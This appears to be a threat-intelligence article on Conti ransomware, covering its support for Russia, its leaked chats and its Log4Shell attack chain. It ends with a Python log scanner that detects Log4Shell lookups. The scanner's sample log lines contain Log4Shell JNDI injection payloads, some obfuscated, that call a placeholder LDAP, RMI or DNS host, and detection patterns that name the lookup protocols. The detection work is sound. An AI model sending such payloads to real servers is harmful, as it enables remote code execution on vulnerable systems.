The US-CERT National Cyber Awareness System (NCAS) Alert AA21-265A, entitled “Conti Ransomware,” was first released on September 22, 2021.
The Alert was recently updated on February 28, 2022: “Conti cyber threat actors remain active and reported Conti ransomware attacks against the U.S. and international organizations have risen to more than 1,000. Notable attack vectors include Trickbot and Cobalt Strike.”
While Conti is considered a ransomware-as-a-service (RaaS) model ransomware variant, there is variation in its structure that differentiates it from a typical affiliate model. It is likely that Conti developers pay the deployers of the ransomware a wage, rather than the percentage of the proceeds used by affiliate cyber actors, and receive a share of the proceeds from a successful attack.
Conti actors often gain initial access [TA0001] to networks through:
While there are no specific or credible cyber threats to the U.S. homeland at this time, CISA, FBI, and NSA encourage organizations to review this advisory and apply the recommended mitigations.
In early February, we first provided an analysis of the cybercrime crackdown by Russian authorities, which included the arrest of members of the REvil gang. Later, we learned that a REvil gang arrestee is tied to the 2021 Colonial Pipeline attack in the U.S. Overall, follow-up reports suggested a growing sentiment that the Russian authorities were out to optimize the appeasement value of this arrest to the U.S. We later suggested that the REvil gang arrest (and the offering up of the individual connected to cyberattacks in the U.S.) was possibly a false flag.
Our suggested scenario at the time: the Russians gave up the REvil gang while still planning to lean on non-state actors within Russia for plausibly deniable cyberwar operations against Ukraine and/or information war efforts that enable a ‘small footprint’ invasion of Ukraine. Our latter assumption has proven true. A few days ago, the Conti gang announced its support for the Russian government.
According to OODA CTO Bob Gourley: “This [announcement by Conti] leads to the logical conclusion that the Russian arrests of REvil and other crooks were not just a signal to the West that they had ransomware under control and would unleash them if they wanted, but was a way to ensure total cooperation of all criminal groups.”
Recorded Future Analyst Dmitry Smilyanets has confirmed the authenticity of conversations leaked by a Ukrainian member of the gang (who was not pleased with the announcement of support for Russia by Conti). The leaked conversations are the result of the Ukrainian member of the group hacking the gang’s internal Jabber/XMPP server. The leaked data contains 339 JSON files with log conversations from January 29, 2021, to February 27, 2022. The leaked data has been made available by security firm IntelligenceX and can be read online. (1)
As we reported back in December 2021 and according to Palo Alto Networks, the Conti Gang was the first ransomware group to weaponize Log4Shell with a full attack chain. Palo Alto Networks refers to the group “as one of the most ruthless ransomware groups known to be active.” Conti has been able to leverage the Log4Shell vulnerability quickly and develop the attack chain. While some experts have the perspective that most attackers have lost interest in Log4Shell as a tool for cyberattacks, other reports confirm that nation-state threat groups continue to exploit the vulnerability. As recently as December of last year, Log4Shell appeared in hacker chatter.
The potential here is that the Conti Gang has already achieved broad access to U.S. systems via the Log4Shell vulnerability – and is simply awaiting an order from the Kremlin to mount an offensive attack.
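The passage above names Log4Shell as the vector but not what a defender can look for. The following is an added example, not code from the OODA article, the CISA alert, or any vendor, showing one way to normalise and scan web-server log lines for Log4Shell lookup strings, including the percent-encoded and nested-lookup forms that naive string matching misses. The sample log lines, the TEST-NET IP addresses and the function names are all constructed assumptions for this illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the page or any real incident).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.9/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /login HTTP/1.1" 200 100 "-" "%24%7Bjndi%3Adns%3A%2F%2F203.0.113.9%2Fc%7D"',
]

# ${lower:x} / ${upper:x} evaluate to x; collapse them so the outer lookup is visible.
NESTED_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-x} (including ${::-x}) evaluates to the default value x.
NESTED_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The lookup prefix and the protocol handlers worth alerting on.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)", re.IGNORECASE)


def normalize(line: str) -> str:
    """Undo percent-encoding and nested lookups until the text stops changing."""
    prev = None
    while prev != line:
        prev = line
        line = unquote(line)
        line = NESTED_CASE.sub(lambda m: m.group(1), line)
        line = NESTED_DEFAULT.sub(lambda m: m.group(1), line)
    return line.lower()


def scan_log_lines(lines):
    """Return (line_number, protocol) for every line carrying a JNDI lookup."""
    hits = []
    for lineno, raw in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(normalize(raw))
        if match:
            hits.append((lineno, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for lineno, proto in scan_log_lines(SAMPLE_LOGS):
        print(f"line {lineno}: JNDI lookup via {proto}")
```

The normalisation loop matters more than the final regex: a single decode or a single substitution leaves double-encoded or doubly-nested lookups undetected, so the script repeats both steps until the line is stable before matching. In production this logic belongs in the log pipeline or SIEM rule, and the same checks should run over request headers (User-Agent, X-Forwarded-For, and so on), since any logged field is a candidate.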
https://oodaloop.com/archive/2022/02/21/russia-ukraine-crisis-resources-for-the-crisis-management-team/
Conti Ransomware Gang Has Full Log4Shell Attack Chain
What’s Really Behind WhisperGate Attacks Against Ukraine?
Log4Shell Activity: Non-State Actors (Global)
Log4Shell Incidents and Mitigation Activities To-date: Governmental Agencies (Global)
Log4Shell Exploit Used in Cox Media Group Ransomware Attack Attributed to Iranian Hackers
Apache Log4j Vulnerability Discussed as part of The December 2021 OODA Network Member Meeting